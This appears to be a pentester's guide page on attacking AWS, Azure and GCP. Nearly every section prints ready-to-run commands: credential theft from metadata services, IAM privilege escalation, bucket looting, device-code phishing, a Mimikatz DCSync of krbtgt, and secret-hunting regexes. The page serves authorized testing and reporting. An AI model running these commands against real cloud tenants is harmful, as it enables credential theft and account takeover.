> ## Documentation Index
> Fetch the complete documentation index at: https://rootea.es/llms.txt
> Use this file to discover all available pages before exploring further.

# Cloud Pentest — AWS · Azure · GCP

> Top exploitable cloud vectors 2024-2026: SSRF to IMDS, IAM privesc paths, public S3 buckets, Entra ID device code, Managed Identities, ConfusedFunction, tooling (Pacu, CloudFox, ROADtools, AzureHound).

<script type="application/ld+json">
  {`{"@context":"https://schema.org","@type":"TechArticle","name":"Cloud Pentesting AWS Azure GCP 2024-2026","description":"Modern cloud exploitation vectors with current tooling","inLanguage":"en","url":"https://rootea.es/en/cloud-pentest"}`}
</script>

# Cloud Pentest — AWS, Azure, GCP

In 2026, **70%+ of corporate infrastructure** lives in cloud. If
your methodology is still `nmap` + on-prem AD, you're missing
most of the perimeter. **99% of cloud breaches through 2025**
come from **customer misconfigurations**, not provider flaws
(Gartner).

<Note>
  The three clouds share concept (shared responsibility,
  identities, ephemeral tokens) but **diverge entirely** in their
  permission model. Attacking AWS with Azure mindset misses 80% of
  real vectors.
</Note>

## Shared responsibility — pentester boundary

| Concept            | AWS IAM                                    | Azure RBAC                                            | GCP IAM                                                                         |
| ------------------ | ------------------------------------------ | ----------------------------------------------------- | ------------------------------------------------------------------------------- |
| Model              | JSON policy attached to user/role/resource | Role assignment over scope (MG > Sub > RG > Resource) | Binding (member, role, resource) on hierarchy Org > Folder > Project > Resource |
| Ephemeral token    | STS `AssumeRole` (1h-12h)                  | Managed Identity / federated token                    | Service Account impersonation                                                   |
| Emblematic privesc | `iam:PassRole` + lambda/ec2                | `Owner` over Managed Identity                         | `iam.serviceAccountTokenCreator`                                                |
| Audit              | CloudTrail                                 | Entra Sign-in Logs + Activity Log                     | Cloud Audit Logs                                                                |

**Pentester boundary** per the "Customer Support Policy for
Penetration Testing":

* **AWS:** EC2, RDS, CloudFront, Aurora, API Gateway, Lambda,
  Lightsail, Elastic Beanstalk **without pre-approval**. DDoS and
  DNS-attack simulation still require a form.
* **Azure:** any tenant resource without prior notice since 2022,
  except sustained DDoS > 200 Gbps.
* **GCP:** "Customer Projects in Scope" policy.

***

## AWS — Top 10 exploitable vectors 2026

### 1. SSRF to IMDSv1 (vs IMDSv2 with hop-limit)

IMDSv2 requires PUT with TTL=1, killing classic SSRF via reverse
proxies. **Still exploitable** when: app follows HTTP redirects,
SSRF is at app layer (not proxy), IMDSv1 still enabled on old
AMIs, or hop-limit was raised to 2 to support containers.

```bash theme={null}
# IMDSv2: get token and steal credentials
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/iam/security-credentials/<role>
```

### 2. IAM Privilege Escalation (Rhino's 21+ paths)

Rhino Security Labs catalogs **21 base paths** + extensions.
Examples: `iam:CreateAccessKey`, `iam:CreateLoginProfile`,
`iam:UpdateAssumeRolePolicy`, `iam:AttachUserPolicy`,
`iam:PutUserPolicy`, `lambda:CreateFunction + iam:PassRole`,
`sagemaker:CreateNotebookInstance + iam:PassRole`,
`glue:CreateDevEndpoint + iam:PassRole`, `ec2:RunInstances + iam:PassRole`.

```bash theme={null}
pacu> set_keys
pacu> run iam__enum_permissions
pacu> run iam__privesc_scan   # auto-exploit
```

### 3. Public S3 buckets (how it still happens in 2026)

Despite "Block Public Access" by default since 2023:
**GrayHatWarfare** indexed >270,000 sensitive PDFs from NACH bank
in August 2025; **23% of cloud incidents 2025** come from
misconfigured buckets.

```bash theme={null}
aws s3 ls s3://target-bucket/ --no-sign-request
aws s3 sync s3://target-bucket/ ./loot/ --no-sign-request

# OSINT
curl "https://buckets.grayhatwarfare.com/api/v2/buckets?keywords=target"
```

### 4. Lambda with plaintext env vars

Anyone with `lambda:GetFunction` reads env vars; in
CloudFormation visible via `cloudformation:GetTemplate`.

```bash theme={null}
aws lambda list-functions --query 'Functions[*].FunctionName'
aws lambda get-function-configuration --function-name <fn> \
  --query 'Environment.Variables'

cloudfox aws lambdas-and-ec2-userdata --profile target
```

### 5. SSM Session Manager abuse

`ssm:StartSession` + `ec2:DescribeInstances` jumps to any EC2.
**New 2023-2025**: SSM agent can register on attacker account and
act as **cross-account RAT** without victim's CloudTrail.

```bash theme={null}
aws ssm describe-instance-information
aws ssm start-session --target i-0abcd1234efgh5678
```

### 6. Cross-account confused deputy

Service assuming cross-account role without `sts:ExternalId` or
`aws:SourceAccount` condition. Typical SaaS integration pattern.

```bash theme={null}
aws sts assume-role \
  --role-arn arn:aws:iam::VICTIM:role/SaasIntegration \
  --role-session-name attacker
```

### 7. Cognito misconfiguration

Identity Pool with guest access grants STS creds without login.
**2025 vulnerability**: `email` attribute mutation in valid token
allows ATO by changing email to victim.

### 8. CloudTrail blind spots

**Whitespace-padding (Permiso):** IAM policies between 102,401
and 131,072 chars cause `requestParameters` to log as
`omitted:true`. Adversaries use `PutEventSelectors`,
`StopEventDataStoreIngestion`, `PutInsightSelectors` instead of
classic `StopLogging`.

### 9. ECS/EKS escape vectors

**ECScape** (Sweet Security 2025): a low-priv ECS container
impersonates the ECS agent and obtains creds for the task
execution role + neighbor tasks via `169.254.170.2`.

```bash theme={null}
curl http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI
```

### 10. Post-exploitation stack

```bash theme={null}
# CloudFox - exhaustive recon
cloudfox aws all-checks --profile target
cloudfox aws permissions --principal user/alice --profile target
cloudfox aws secrets --profile target

# Pacu
pacu --session demo
pacu> import_keys default
pacu> run aws__enum_account
pacu> run iam__bruteforce_permissions
pacu> run s3__bucket_finder
```

***

## Azure — Top 10 exploitable vectors 2026

### 1. Entra ID device code phishing

**Storm-2372** (Feb 2025) and **AI-enabled device code campaigns**
(April 2026) consolidate device code flow as dominant vector.

```bash theme={null}
roadtx devicecode -c 29d9ed98-a469-4536-ade2-f981bc1d605e \
  -r https://graph.microsoft.com
roadtx interactiveauth   # after victim enters the code
roadtx prtenrich         # pivot to PRT by registering device
```

### 2. App Registrations with secrets in repos

Search `clientSecret`, `client_secret`, `app_secret` + tenant
GUID on GitHub/Sourcegraph. With `(tenantId, clientId, clientSecret)`
you request Graph token and act as the app.

```bash theme={null}
curl -X POST "https://login.microsoftonline.com/$TID/oauth2/v2.0/token" \
  -d "client_id=$CID&scope=https://graph.microsoft.com/.default&client_secret=$CSEC&grant_type=client_credentials"
```

### 3. Managed Identities abuse

VM/Function/App Service with MI requests token from
`169.254.169.254` (System-assigned) or `IDENTITY_ENDPOINT`
(User-assigned). MI with `Contributor` or `Key Vault Secrets
User` = full lateral movement.

```bash theme={null}
# From compromised Linux VM
curl "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https%3A%2F%2Fvault.azure.net" \
  -H "Metadata: true"

az login --identity
az keyvault secret show --vault-name target-kv --name dbpass
```

### 4. Azure Functions privilege escalation

CVE-2025-59273 (Event Grid) allows unvalidated payloads in
Functions/Logic Apps. CVE-2025-62207 (Azure Monitor) SSRF →
privesc. Historically "Royal Flush": Functions containers with
`--privileged` allowed host escape.

### 5. Storage Account anonymous access

Anonymous listing via `?restype=container&comp=list`.
**STORM-0501** (2025 ransomware campaign) uses this for exfil.

```bash theme={null}
curl "https://victim.blob.core.windows.net/\$logs?restype=container&comp=list"
curl "https://victim.blob.core.windows.net/?comp=list"
```

### 6. Key Vault permission misconfigs

`Contributor` can modify KV Access Policies (legacy model) and
read secrets without being formally KV-admin.

```bash theme={null}
az keyvault list
az keyvault secret list --vault-name target-kv
az keyvault secret show --vault-name target-kv --name connectionstring
```

### 7. Conditional Access bypass

**CVE-2025-55241** (Dirk-jan Mollema, July 2025): cross-tenant
tokens evading CA. Generic vectors: legacy User Agents, IPs from
non-excluded ranges, FOCI app swap.

### 8. PIM elevation abuse

PIM URLs accessible even with "Restrict access to Microsoft Entra
admin center" enabled. Compromised user with eligible role + token
prior to PIM activation can activate role without MFA in some
cases.

### 9. Lateral movement Entra → on-prem AD Connect

The AD Connect server holds the `MSOL_<random>` account with
DCSync rights. Local admin on Sync server → `aadconnectdump` or
`AADInternals` extract encrypted creds → DCSync → on-prem DA.

```powershell theme={null}
Import-Module AADInternals
Get-AADIntSyncCredentials   # dump MSOL hash from AD Connect
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /user:krbtgt"'
```

### 10. Post-exploitation stack

```bash theme={null}
# ROADtools - full enum after token
roadrecon auth -u user@target.com -p 'pass'
roadrecon gather
roadrecon gui   # http://localhost:5000

# AzureHound (BloodHound CE 5.x)
JWT=$(az account get-access-token --resource https://graph.microsoft.com | jq -r .accessToken)
azurehound list --jwt "$JWT" --tenant target.onmicrosoft.com -o azhound.json

# AADInternals
Get-AADIntLoginInformation -UserName user@target.com
Invoke-AADIntPhishing -Tenant <id> -PushNotification
```

***

## GCP — Top vectors

### 1. Service Account keys leakage

SAs with JSON keys in repos / public S3. Key **doesn't expire**
by default.

```bash theme={null}
gcloud auth activate-service-account --key-file=key.json
gcloud projects list
```

### 2. Compute Engine metadata SSRF

GCP requires `Metadata-Flavor: Google` header since 2019. Key
endpoint:
`http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token`.

```bash theme={null}
curl -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
```

### 3. IAM hierarchy escalation

Key permissions for full privesc:

* `iam.serviceAccountTokenCreator` — generate tokens for any SA
* `iam.serviceAccountKeyAdmin` — create new keys
* `cloudfunctions.functions.update + actAs` — pivot to arbitrary SA
* `compute.instances.setMetadata` — inject SSH key in startup script

```bash theme={null}
gcloud iam service-accounts get-iam-policy target-sa@p.iam.gserviceaccount.com
gcloud iam service-accounts keys create key.json \
  --iam-account=target-sa@p.iam.gserviceaccount.com
```

### 4. ConfusedFunction (Tenable 2024)

Creating/updating Cloud Function attaches the SA
`<projnum>@cloudbuild.gserviceaccount.com` with default Editor
role, allowing escalation to project Editor.

```bash theme={null}
gcloud functions deploy evil --runtime python311 \
  --trigger-http --entry-point main --source . \
  --service-account target@p.iam.gserviceaccount.com
```

### 5. OSINT and post-exploitation stack

```bash theme={null}
# GCPBucketBrute
python3 gcpbucketbrute.py -k target-keyword -u
python3 gcpbucketbrute.py -k target-keyword -f sa-key.json

# gcloud quick-wins
gcloud projects get-iam-policy <PROJECT> --format=json
gcloud auth print-access-token
gcloud secrets list && \
  gcloud secrets versions access latest --secret=<NAME>
```

***

## Modern tooling 2026

| Tool                               | Cloud                     | Typical use                                       | Status                                              |
| ---------------------------------- | ------------------------- | ------------------------------------------------- | --------------------------------------------------- |
| **Pacu**                           | AWS                       | Exploitation framework, 35+ modules               | Active (Rhino)                                      |
| **CloudFox v1.17+**                | AWS / Azure / GCP         | Post-exploitation, 34 cmds AWS                    | Active (Bishop Fox)                                 |
| **ROADtools / roadrecon / roadtx** | Azure / Entra             | Enum + token mgmt + device code                   | Active (Dirk-jan)                                   |
| **AADInternals**                   | Azure / M365              | PowerShell, federation backdoors, AD Connect dump | Active                                              |
| **AzureHound + BloodHound CE 5.x** | Azure / Entra             | Path-finding via Cypher                           | Active (SpecterOps)                                 |
| **GCPBucketBrute**                 | GCP                       | Bucket enum + privesc test                        | Active (Rhino)                                      |
| **Prowler v5+**                    | Multi (AWS/Azure/GCP/K8s) | CIS/NIST/PCI audit, 500+ checks                   | Very active                                         |
| **PurplePanda**                    | GCP / Azure / GitHub      | Privilege escalation paths                        | Active                                              |
| **ScoutSuite**                     | Multi                     | Visual HTML audit                                 | **De-facto deprecated** (no updates since May 2024) |

***

## Cloud-specific OSINT

### S3 bucket enum

```bash theme={null}
python3 cloud_enum.py -k target -k target-corp
gobuster s3 -w wordlists/s3-buckets.txt \
  -b "target-,target-prod-,target-dev-"
```

### GitHub dorking — 2026 regex

```
AWS_ACCESS_KEY_ID:        AKIA[0-9A-Z]{16}
AWS_SECRET_ACCESS_KEY:    [A-Za-z0-9/+=]{40}
Azure tenant + clientId:  [0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}
GCP SA key:               "type": "service_account"
```

```bash theme={null}
# Trufflehog v3 (verifies secret online)
trufflehog github --org=target --only-verified

# Gitleaks (fast, regex)
gitleaks detect --source . --report-format json --report-path leaks.json
```

GitGuardian: **28.65M secrets** leaked publicly on GitHub in 2025,
**+34% YoY**.

### GrayHatWarfare + SourceGraph

```bash theme={null}
curl "https://buckets.grayhatwarfare.com/api/v2/buckets?keywords=target"
curl "https://buckets.grayhatwarfare.com/api/v2/files?keywords=db.sql"

# SourceGraph: AKIA[A-Z0-9]{16} content:.* file:\.env$
# https://sourcegraph.com/search
```

***

## Reporting cloud findings

### Applicable CVSS (with cloud context)

| Finding                                   | CVSS           | Justification          |
| ----------------------------------------- | -------------- | ---------------------- |
| Public S3 bucket with PII                 | 7.5 (High)     | High C, no auth        |
| IAM role with `iam:*` accessible via SSRF | 9.8 (Critical) | High C/I/A, AV:N       |
| MI with `Contributor` on sub              | 9.1 (Critical) | Full tenant privesc    |
| CloudTrail log evasion via padding        | 5.3 (Medium)   | Only I (log integrity) |
| Cognito self-signup → guest STS           | 7.3 (High)     | Mid C+I                |

Always combine with **EPSS** (30-day exploit probability) and
business context.

### Quantifying impact

* **Billing abuse:** hourly cost of malicious instances (BTC
  mining: a `p3.16xlarge` runs \~25 USD/h). Project to 30/90 days
  if account stays compromised.
* **Data exfil:** bucket size × egress price (`$0.09/GB`
  outbound AWS) + regulatory data value.
* **Resource hijacking / LLMjacking** (2024-2025): Bedrock
  invokeModel, Azure OpenAI = massive billing.

### GDPR in cloud

* **Art. 33** 72h breach notification applies to cloud customer
  (still Data Controller).
* **International transfers:** map regions — use EU-only
  (eu-west-3, westeurope, europe-west1) and verify SCC + TIA
  post Schrems II.
* **Art. 32** technical measures: SSE-KMS (CMK), TLS 1.2+,
  pseudonymization, mandatory MFA, traceability.
* **Mandatory DPIA** if cloud system processes special categories
  at scale (Art. 35).

***

## Resources

* [Hacking The Cloud](https://hackingthe.cloud) — Wiki by Rhino
* [Datadog Security Labs](https://securitylabs.datadoghq.com/)
* [Wiz Cloud Threat Reports](https://www.wiz.io/research)
* [NetSPI Cloud Pentesting blog](https://www.netspi.com/blog/technical-blog/cloud-pentesting/)
* [Bishop Fox CloudFox](https://github.com/BishopFox/cloudfox)
* [Rhino — AWS IAM PrivEsc](https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation)
* [Rhino — GCP IAM PrivEsc](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation)
* [Microsoft Storm-2372](https://www.microsoft.com/en-us/security/blog/2025/02/13/storm-2372-conducts-device-code-phishing-campaign/)
* [Tenable — ConfusedFunction](https://www.tenable.com/blog/confusedfunction-a-privilege-escalation-vulnerability-impacting-gcp-cloud-functions)

***

## Related resources

* [Professional web recon](/en/web-recon) — Passive,
  fingerprinting, type confusion (common to cloud).
* [Tactical glossary](/en/glossary) — IAM, JA3, SSRF.
* [Report template](/en/report-template) — CVSS and GDPR.
